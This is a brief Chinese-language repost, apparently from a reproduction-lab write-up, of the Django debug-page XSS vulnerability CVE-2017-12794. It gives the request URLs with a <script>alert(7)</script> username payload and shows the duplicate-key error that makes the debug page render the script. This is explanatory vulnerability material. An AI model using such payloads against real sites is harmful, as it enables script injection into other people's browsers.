Django debug page XSS漏洞(CVE-2017-12794)
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Django debug page XSS漏洞(CVE-2017-12794)相关的知识,希望对你有一定的参考价值。
1.创建个用户:ip:8000/create_user/?username=<script>alert(7)</script>
显示用户已创建。
2.触发漏洞,再次访问ip:8000/create_user/?username=<script>alert(7)</script>
3.触发异常:
duplicate key value violates unique constraint "xss_user_username_key"
DETAIL: Key (username)=(<script>alert(7)</script>) already exists.
4.这个异常被拼接进The above exception ({{ frame.exc_cause }}) was the direct cause of the following exception,最后触发XSS。
以上是关于Django debug page XSS漏洞(CVE-2017-12794)的主要内容,如果未能解决你的问题,请参考以下文章
Django debug page XSS漏洞(CVE-2017-12794)
Django debug page XSS漏洞(CVE-2017-12794)
Django debug page XSS漏洞(CVE-2017-12794)